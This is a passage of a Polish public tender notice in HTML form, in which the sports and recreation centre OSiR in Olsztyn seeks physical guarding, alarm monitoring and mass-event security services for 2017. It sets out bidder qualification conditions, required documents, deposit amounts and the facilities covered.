                Wykonawca spełni warunek jeżeli wykaże, że: wykonał lub wykonuje w okresie ostatnich 3 lat co najmniej:
Dotyczy CZĘŚCI I 
c1)  Min. 2 usługi w zakresie świadczenia usług związanych z ochroną osób i mienia o wartości co najmniej  200.000 zł brutto każda z dokumentami potwierdzającymi ich należyte wykonanie
c2) Posiadanie min. dwóch grup interwencyjnych i patroli zmotoryzowanych odpowiednio wyposażonych 
c3) Posiadanie oddziału (filii) Agencji Ochrony w Olsztynie a także własnej stacji do monitoringu sygnałów z  zainstalowanych urządzeń alarmowych Zamawiającego
c4) Zatrudnienie pracowników ochrony zdolnych do wykonania zamówienia i odpowiednio przeszkolonych  i oznaczonych z widocznym napisem OCHRONA
Dotyczy CZĘŚCI II 
c1) Min. 6 usług w zakresie świadczenia ochrony imprez masowych w obiektach zamkniętych na minimum 1000 osób oraz min. 3 usług w zakresie ochrony imprez masowych w terenie otwartym  z dokumentami potwierdzającymi ich należyte wykonanie
c2) Posiadanie odpowiedniej ilości oznakowanych pojazdów służbowych, ubiory służbowe dla wszystkich pracowników biorących udział w zabezpieczeniu imprezy, środki łączności bezprzewodowej, wyposażenie indywidualne pracownika niezbędne w zakresie pełnionych czynności wymaganych ustawą.

Dotyczy CZĘŚCI III
c1)  Min. 2 usługi w zakresie świadczenia usług związanych z ochroną osób i mienia o wartości co najmniej   50.000 zł brutto każda z dokumentami potwierdzającymi ich należyte wykonanie
c2) Posiadanie min. Dwóch grup interwencyjnych i patroli zmotoryzowanych odpowiednio wyposażonych 
c3) Posiadanie oddziału (filii) Agencji Ochrony w Olsztynie a także własnej stacji do monitoringu sygnałów z  zainstalowanych urządzeń alarmowych Zamawiającego
c4) Zatrudnienie pracowników ochrony zdolnych do wykonania zamówienia i odpowiednio przeszkolonych  i oznaczonych z widocznym napisem OCHRONA
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a)	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z postępowania:
a1) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej;
         b)	W celu potwierdzenia kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o  
                    ile wynika to z odrębnych przepisów. Wykonawca spełni warunek jeżeli wykaże posiana koncesję   
                    wydaną na podstawie  Ustawy z dnia 22.08.1997 r. o Ochronie Osób i Mienia (Dz. U. z 2005, nr 145, poz.  
                    1221 z późn. zmianami)   
          c)	W celu potwierdzenia sytuacji ekonomicznej lub finansowej. Wykonawca spełni warunek jeżeli wykaże,  
                  że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z 
                  przedmiotem zamówienia na sumę gwarancyjną min. 1.500.000 PLN zgodnie z Rozporządzeniem Ministra   
                  Rozwoju z dnia 26.07.2016 r. w sprawie rodzajów dokumentów jakich może żądać Zamawiający od  
                  Wykonawcy w postepowaniu o udzielenie zamówienia.
d)	W celu potwierdzenia zdolności technicznej lub zawodowej. Wykonawca spełni warunek jeżeli wykaże,   
   przedłoży zamawiającemu:

Dotyczy CZĘŚCI I
d1)  Wykaz usług potwierdzający ilość wykonanych lub wykonywanych w okresie ostatnich 3 lat usług w zakresie ochrony fizycznej i monitoringu o wartości co najmniej 200.000 zł brutto każda (co najmniej 2 usługi) z dokumentami potwierdzającymi ich należyte wykonanie  wzór wg załącznika do SIWZ
                
	Dotyczy CZĘŚCI II
d2) Wykaz usług potwierdzający ilość wykonanych lub wykonywanych w okresie ostatnich 3 lat usług: Min. 6 usług w zakresie świadczenia ochrony imprez masowych w obiektach zamkniętych na minimum 1000 osób oraz min. 3 usługi w zakresie ochrony imprez masowych w terenie otwartym  z dokumentami potwierdzającymi ich należyte wykonanie  wzór wg załącznika do SIWZ
                
                  Dotyczy CZĘŚCI III
                 d3) Wykaz usług potwierdzający ilość wykonanych lub wykonywanych w okresie ostatnich 3 lat usług w 
                 zakresie ochrony fizycznej i monitoringu o wartości co najmniej 50.000 zł brutto każda (co najmniej 2 
                 usługi) z dokumentami potwierdzającymi ich należyte wykonanie  wzór wg załącznika do SIWZ.

e)	W celu potwierdzenia kryterium  aspekty społeczne Wykonawca przedłoży Zamawiającemu Oświadczenie o zatrudnieniu deklarowanej ilości osób bezrobotnych i niepełnosprawnych zgodnie ze wzorem do SIWZ (dot. części I i III).
f)	W celu potwierdzenia kryterium doświadczenie osób wyznaczonych do realizacji zamówienia 
(dot. części II):
1.Kierownik ds. bezpieczeństwa z doświadczeniem zabezpieczenia imprez masowych min. 5 imprez, w których uczestniczyło min. 1500 osób w każdej w okresie ostatnich trzech lat. Wykonawca przedłoży Zamawiającemu oświadczenie o ilości imprez spełniających to kryterium zgodnie ze wzorem do SIWZ i
                2.Pracownicy ochrony z doświadczeniem ochrony min. 4 imprez masowych na min 1500 osób każda w    
                okresie ostatnich trzech lat. Wykonawca przedłoży Zamawiającemu Oświadczenie o ilości osób 
                spełniających to kryterium zgodnie ze wzorem do SIWZ.
9.	Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 3 ustawy PZP, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />2)	spełniają warunki udziału w postępowaniu dotyczące:
a)	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów. Wykonawca spełni warunek jeżeli wykaże, że posiada koncesję wydaną na podstawie Ustawy z dnia 22.08.1997 r. o Ochronie Osób i Mienia (Dz. U. z 2005, nr 145, poz. 1221 z późn. zmianami) na prowadzenie działalności gospodarczej określonej w niniejszym postępowaniu.                    ( dotyczy CZĘŚCI  I, II i III)
b)	sytuacji ekonomicznej lub finansowej. Wykonawca spełni warunek jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną min. 1.500.000 PLN. (Dotyczy CZĘŚCI I, II i III)
c)	zdolności technicznej lub zawodowej. Wykonawca spełni warunek jeżeli wykaże, że: wykonał lub wykonuje w okresie ostatnich 3 lat co najmniej:
Dotyczy CZĘŚCI I 
c1)  Min. 2 usługi w zakresie świadczenia usług związanych z ochroną osób i mienia o wartości co najmniej  200.000 zł brutto każda z dokumentami potwierdzającymi ich należyte wykonanie
c2) Posiadanie min. dwóch grup interwencyjnych i patroli zmotoryzowanych odpowiednio wyposażonych 
c3) Posiadanie oddziału (filii) Agencji Ochrony w Olsztynie a także własnej stacji do monitoringu sygnałów z  zainstalowanych urządzeń alarmowych Zamawiającego
c4) Zatrudnienie pracowników ochrony zdolnych do wykonania zamówienia i odpowiednio przeszkolonych  i oznaczonych z widocznym napisem OCHRONA
Dotyczy CZĘŚCI II 
c1) Min. 6 usług w zakresie świadczenia ochrony imprez masowych w obiektach zamkniętych na minimum 1000 osób oraz min. 3 usług w zakresie ochrony imprez masowych w terenie otwartym  z dokumentami potwierdzającymi ich należyte wykonanie
c2) Posiadanie odpowiedniej ilości oznakowanych pojazdów służbowych, ubiory służbowe dla wszystkich pracowników biorących udział w zabezpieczeniu imprezy, środki łączności bezprzewodowej, wyposażenie indywidualne pracownika niezbędne w zakresie pełnionych czynności wymaganych ustawą.

Dotyczy CZĘŚCI III
c1)  Min. 2 usługi w zakresie świadczenia usług związanych z ochroną osób i mienia o wartości co najmniej   50.000 zł brutto każda z dokumentami potwierdzającymi ich należyte wykonanie
c2) Posiadanie min. Dwóch grup interwencyjnych i patroli zmotoryzowanych odpowiednio wyposażonych 
c3) Posiadanie oddziału (filii) Agencji Ochrony w Olsztynie a także własnej stacji do monitoringu sygnałów z  zainstalowanych urządzeń alarmowych Zamawiającego
c4) Zatrudnienie pracowników ochrony zdolnych do wykonania zamówienia i odpowiednio przeszkolonych  i oznaczonych z widocznym napisem OCHRONA
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Dotyczy CZĘŚCI I
d1)  Wykaz usług potwierdzający ilość wykonanych lub wykonywanych w okresie ostatnich 3 lat usług w zakresie ochrony fizycznej i monitoringu o wartości co najmniej 200.000 zł brutto każda (co najmniej 2 usługi) z dokumentami potwierdzającymi ich należyte wykonanie  wzór wg załącznika do SIWZ
                
	Dotyczy CZĘŚCI II
d2) Wykaz usług potwierdzający ilość wykonanych lub wykonywanych w okresie ostatnich 3 lat usług: Min. 6 usług w zakresie świadczenia ochrony imprez masowych w obiektach zamkniętych na minimum 1000 osób oraz min. 3 usługi w zakresie ochrony imprez masowych w terenie otwartym  z dokumentami potwierdzającymi ich należyte wykonanie  wzór wg załącznika do SIWZ
                
                  Dotyczy CZĘŚCI III
                 d3) Wykaz usług potwierdzający ilość wykonanych lub wykonywanych w okresie ostatnich 3 lat usług w 
                 zakresie ochrony fizycznej i monitoringu o wartości co najmniej 50.000 zł brutto każda (co najmniej 2 
                 usługi) z dokumentami potwierdzającymi ich należyte wykonanie  wzór wg załącznika do SIWZ.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Formularz ofertowy zał. nr 2 do SIWZ. 2. Formularze cenowe do części I, II i III. 3.Oświadczenie o przynależności do tej samej grupy kapitałowej i inne wymagane oświadczenia stanowiące załączniki do SIWZ.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Wykonawca zobowiązany jest wnieść wadium w wysokości:
CZĘŚĆ I  10.000,00 PLN (słownie: dziesięć tysięcy złotych)
CZĘŚĆ II       450,00 PLN (słownie: czterysta pięćdziesiąt złotych)
CZĘŚĆ III  2.000,00  PLN (słownie: dwa tysiące złotych)
przed upływem terminu składania ofert.
2.	Wadium może być wniesione w:
1)	pieniądzu;
2)	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, 
      że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku City Bank nr rachunku 60 1030 1218 0000 0000 9050 5068, z dopiskiem na przelewie: Wadium w postępowaniu A-ZP.OSiR.171.4.2016 na usługę ochrony fizycznej i monitoringu obiektów OSiR w 2017 r..
4.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w rozdz. VIII. 3 niniejszej SIWZ, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).
5.	Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
1)	pieniężnej  dokument potwierdzający dokonanie przelewu wadium został załączony do oferty;
2)	innej niż pieniądz  oryginał dokumentu został złożony w oddzielnej kopercie, a jego kopia w ofercie.
6.	Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy PZP.
7.	Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona.
8.	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa PZP.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje zmiany postanowień umowy zgodnie ze wzorami umów stanowiącymi załączniki do SIWZ Nr 4 dot.części I określone w paragrafie 15; Nr 4a dot. części II określone w paragrafie 14; nr 4b dot. części III określone w paragrafie 12.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 02/12/2016, godzina: 13:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Część I Zamówienia Wykonanie bezpośredniej ochrony fizycznej oraz monitoringu elektornicznego z zainstalowanych urządzeń alarmowych w obiektach OSiRw <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1)	HWS Urania w Olsztynie, al. Piłsudskiego 44 .Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1 do SIWZ Opis przedmiotu zamówienia
2)	Lodowisko-Boisko w Olsztynie ul. Jeziołowicza 4.Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1a do SIWZ Opis przedmiotu zamówienia
3)	ZOOS Stadion w Olsztynie przy al. Piłsudskiego 69 A. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1b do SIWZ Opis przedmiotu zamówienia. 
4)	ZKOS I w Olsztynie, ul. Głowackiego 27. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1c do SIWZ Opis przedmiotu zamówienia.
5)	ZKOS II  w Olsztynie, ul. Mariańska 1. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1d do SIWZ Opis przedmiotu zamówienia.
6)	CRS Ukiel Olsztyn, obszar przy ul. Olimpijskiej 1. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1e do SIWZ Opis przedmiotu zamówienia.
7)	CRS Ukiel Olsztyn, obszar przy ul. Sielskiej 38. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1e do SIWZ Opis przedmiotu zamówienia
8)	Kąpielisko Sezonowe SKANDA - Olsztyn, ul. Plażowa nad jeziorem Skanda.  Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1e do SIWZ Opis przedmiotu zamówienia
9)	Kąpielisko sezonowe SŁONECZNA POLANA, Olsztyn, ul. Sielska 38 nad jeziorem Ukiel. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1e do SIWZ Opis przedmiotu zamówienia
10)	 WCRS Aquasfera GALERIA WARMIŃSKA, Olsztyn ul. Piłsudskiego 69 b. Szczegółowy zakres świadczenia ochrony stanowi zał. nr 1f do SIWZ Opis przedmiotu zamówienia
11) Ochrona elektroniczna  - monitoring (obsługa z już zainstalowanych urządzeń alarmowych oraz interwencje w   przypadku alarmów) z następujących obiektów całodobowo:
 Administracyjna część budynku  Zarząd OSiR w  tym garaże w Olsztynie, ul. Żołnierska 13 a.
ZKOS I  Olsztyn, ul. Głowackiego 27.
Szczegółowy zakres świadczenia ochrony - monitoringu stanowi zał. nr 1g do   SIWZ Opis przedmiotu zamówienia. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>79710000-4, 79711000-1,
                    75240000-0,
                    98390000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  381741<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Aspekty społeczne - zatrudnienie osób bezrobotnych</td><td>20</td></tr><tr><td>Aspekty społeczne - zatrudnienie osób niepełnosprawnych</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Część II zamówienia Ochrona Masowych imprez sportowych organizowanych przez OSiR w Olsztynie w 2017<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Ochrona masowych imprez sportowych organizowanych przez OSiR w Olsztynie w 2017 r.
Do zadań ochrony sportowych imprez masowych należeć będzie zabezpieczenie sportowych imprez masowych odbywających się w:
-  Hali Widowiskowo  Sportowej Urania 
- Wodnym Centrum Sportowo  Rekreacyjnym  Aquasfera Galeria Warmińska  imprezy pływackie rangi Mistrzostw Polski (ilość imprez zależna od decyzji PZP o przyznaniu Ośrodkowi Sportu i Rekreacji w Olsztynie imprezy do realizacji)
-  imprez odbywających się na terenie Centrum Rekreacyjno-Sportowego Ukiel  z wyłączeniem   turnieju rangi World Tour Grand Slam w Siatkówce Plażowej
- II Ukiel Olsztyn Półmaraton zabezpieczenie na terenie miasta.
- imprezy nie przewidziane w Kalendarzu Imprez
W sumie  900 roboczogodzin.
Do zadań kierownika zabezpieczenia należeć będzie opracowanie Planu Zabezpieczenia Imprezy Sportowej o Charakterze Masowym wraz z Instrukcją postępowania w przypadku pożaru lub innego miejscowego zagrożenia w miejscu i w czasie imprezy masowej i dostarczeniu go w odpowiednim terminie min. 35 dni przed planowanym wydarzeniem organizatorowi. Podczas imprez na terenie miasta zabezpieczenie musi posiadać własny transport samochodowy w celu sprawnego rozmieszczania poszczególnych posterunków oraz własne środki łączności pozwalające na kontakt pomiędzy pracownikami a także z dyżurnym miasta, policją, strażą pożarną i pogotowiem medycznym. Pracownicy służby porządkowej oraz kierownik zabezpieczenia  muszą być przeszkoleni zgodnie z Rozporządzeniem Rady Ministrów z dnia 30 sierpnia 2011 r. (Dz. U. nr 183 poz. 1087 ze zmianami) i muszą posiadać aktualne zaświadczenia uprawniające do zabezpieczenia imprez masowych. Pracownicy służby porządkowej oraz służby informacyjnej podczas imprez muszą być ubrani w jednakowe 